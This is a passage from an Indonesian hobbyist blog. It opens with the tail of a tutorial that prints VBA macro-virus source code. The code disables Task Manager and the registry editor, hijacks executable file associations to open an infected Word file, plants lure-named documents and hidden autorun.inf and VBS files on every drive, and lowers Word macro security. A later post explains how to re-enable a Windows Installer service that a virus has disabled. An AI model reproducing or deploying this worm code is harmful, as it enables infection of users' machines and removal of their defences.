      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″

      b.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, “1″

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\”, “Tong Sampah Macroid”

      b.regwrite “HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\”, “Komputer Morphic”

      b.regwrite “HKLM\SOFTWARE\Classes\exefile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\comfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\txtfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\scrfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\batfile\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shell\”, “0pen”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\”, “&Open”

      b.regwrite “HKLM\SOFTWARE\Classes\Folder\shellpen\command\”, “wscript.exe ” & Environ$(“windir”) & “\avmc.vbs”

      b.regwrite “HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\”, “Winword.exe ” & Environ$(“windir”) & “\Macroid.doc”

      On Error Resume Next

      Dim rog As Integer

      Dim atr, vbs, Tipu(10), Trik(10) As String

      For a = 66 To 90

      partisi = Chr$(a)

      vbs = partisi & “:\auto.vbs”

      atr = partisi & “:\autorun.inf”

      Tipu(1) = partisi & “:\Soal SPMB 1995-2008.doc”

      Tipu(2) = partisi & “:\Kisah di balik HarryPotter.doc”

      Tipu(3) = partisi & “:\Titip File sebentar.doc”

      Tipu(4) = partisi & “:\jangan di baca.doc”

      Tipu(5) = partisi & “:\buku harian.doc”

      Tipu(6) = partisi & “:\cerita hangat.doc”

      Tipu(7) = partisi & “:\Punya Baim.doc”

      Tipu(8) = partisi & “:\Teka-teki yang baru.doc”

      Tipu(9) = partisi & “:\Kumpulan cerita lucu.doc”

      Tipu(10) = partisi & “:\Trik Sulap.doc”

      If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then

      Randomize

      rog = Int(10 * Rnd) + 1

      Open Tipu(rog) For Output As #1

      Print #1, “”

      Close #1

      End If

      Trik(1) = partisi & “:\Novel J.K.Rowling.doc”

      Trik(2) = partisi & “:\cerita cinta.doc”

      Trik(3) = partisi & “:\Ringkasan cerita HarryPotter.doc”

      Trik(4) = partisi & “:\Semua Cheat game DOTA.doc”

      Trik(5) = partisi & “:\Kumpulan Cheat game.doc”

      Trik(6) = partisi & “:\Cheat game RF.doc”

      Trik(7) = partisi & “:\Cheat game Ayo Dance.doc”

      Trik(8) = partisi & “:\Goosebumps.doc”

      Trik(9) = partisi & “:\FearStreet.doc”

      Trik(10) = partisi & “:\R.L.Stine.doc”

      If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then

      Randomize

      rogi = Int(10 * Rnd) + 1

      Open Trik(rogi) For Output As #1

      Print #1, “”

      Close #1

      End If

      Open atr For Output As #1

      Print #1, “[Autorun]“

      Print #1, “shell\Open\command=wscript.exe auto.vbs”

      Close #1

      SetAttr atr, vbHidden + vbSystem

      Open vbs For Output As #1

      Print #1, “dim a”

      Print #1, “set a = createobject(” & Chr(34) & “Wscript.shell” & Chr(34) & “)”

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\10.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\11.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Print #1, “a.regwrite ” & Chr(34) & “HKCU\Software\Microsoft\Office\12.0\Word\Security\Level” & Chr(34) & “,” & Chr(34) & “1″ & Chr(34) & “,” & Chr(34) & “REG_DWORD” & Chr(34)

      Close #1

      SetAttr vbs, vbHidden + vbSystem

      Next a

      End Sub

      Hati –hati dengan source diatas. Karena lumayan bikin pening juga. Tapi maaf ya kalo aku gak bisa jelasinnya sekarang. Karena kalo aku jelasin nanti tutorial ini terlalu panjangggggggggggggggg……. Makanya penjelasan mengenai source di atas aku buat di tutorial kedua.

      EFEK-EFEK KECIL DAN TANDA-TANDA TERINFEKSI

      Nah coba tebak mana file virus dan mana file yang bukan virus!!!!!!!!

      Jawabannya lihat di bawah!!

      By: Morphic

      http://morphians.wordpress.com (My blog)

      www.friendster.com/morphic (my friendster)

      karta_morphic@yahoo.co.id (mail me here!)

      http://morphic.4shared.com (Download file and upload virus here!)

      Special thankz to:

      -Both of my parents

      -Both of my sisters

      -All of my friends in Smansa Medan (khususnya anak-anak XII IPA 10)

      -Para pejuang UMB dan SNMPTN tahun depan. (Semoga aku lulussss!!!!)

      -Anak-anak Permata_SetiaBudi Medan

      -MorphostLab!

      Ditulis dalam Uncategorized | 7 Komentar »

      Tidak bisa menginstall karena virus???

      Ditulis oleh Morphic di/pada September 3, 2008

      Tidak bisa menginstall karena virus???

      Yah, sekedar iseng-iseng bikin artikel. Soalnya mungkin ada sebagian orang yang ngerasa bosan kalo terus-terusan artikel Morphic membahas analisis virus dan Morphost. Untuk kali ini saya tidak membahas analisis virus dan Morphost melainkan efek-efek virus. Salah satunya kenapa tidak bisa menginstall saat kena virus.

      Banyak faktor kenapa gak bisa menginstall. Salah satu mungkin karena service Windows Installer di komputermu sudah didisable oleh si virus.

      Waktu kita menginstal muncul gambar di bawah ini:

      Yang tadinya kita pengen nginstal antivirus, kita jadi gak bisa deh… Padahal kita tadi pengen bersihin komputer kita pake antivirus (<mode promosi: ON> Morphost juga antivirus loh).

      Artikel kali ini gak usah panjang-panjang. Saya akan jelaskan bagaimana mengenablenya. (Artikel ini khusus bagi orang yang belum tahu! Bagi yang sudah tahu, dilarang keras!!!!!!!)

      Caranya:
      Buka Start lalu klik Run
      Pada kotak dialog Run ketik “services.msc”

      Ooops muncul pertanyaan! Bagaimana kalo komputer kita itu fungsi run-nya didisable alias gak berfungsi?
      Oke! Caranya buka control Panel! Lalu buka “Administrative tools” dan buka “services”

      Ooops Muncul pertanyaan lagi! Bagaimana kalo control panel gak bisa dibuka?
      Yah, caranya buka file “C:\windows\system32\services.msc”

      Terakhir akan muncul gambar dibawah ini:


      Terus Cari yang namanya “Windows Installer”
      Lalu double klik pada services yang namanya “Windows Installer” hingga muncul gambar dibawah ini:

      Lalu pada startup type terdapat tulisan “Disabled”. Nah, sekarang tugas kita mengganti tulisan itu menjadi “Automatic” atau “Manual”
      Terserah mau ganti jadi apa asalkan bukan ”Disabled”

      LALU KLIK OK!!!!!!!!!!!!!!!!!!!!

      Yap, sekarang dah selesai.
      Sekian tutorial saya yang gak ada apa-apanya ini yah.

      By: Morphic
      http://www.morphic.co.nr (Comment me here)
      http://www.friendster.com/morphic (My friendster)
      http://morphians.wordpress.com (my blog)
      karta_morphic@yahoo.co.id (my email)
      http://morphic.4shared.com (download Morphost and Morphost database here!)
      and don’t forget to join with MorphostLab! (FriendsterGroup)
      special thanks to
      -anak-anak Smansa Medan
      -Samuel Pola Karta (nama asliku boss!)
      -MorphostLab!
      -Kawan-kawan yang udah ngirim virus ke My4shared!

      Ditulis dalam Uncategorized | 3 Komentar »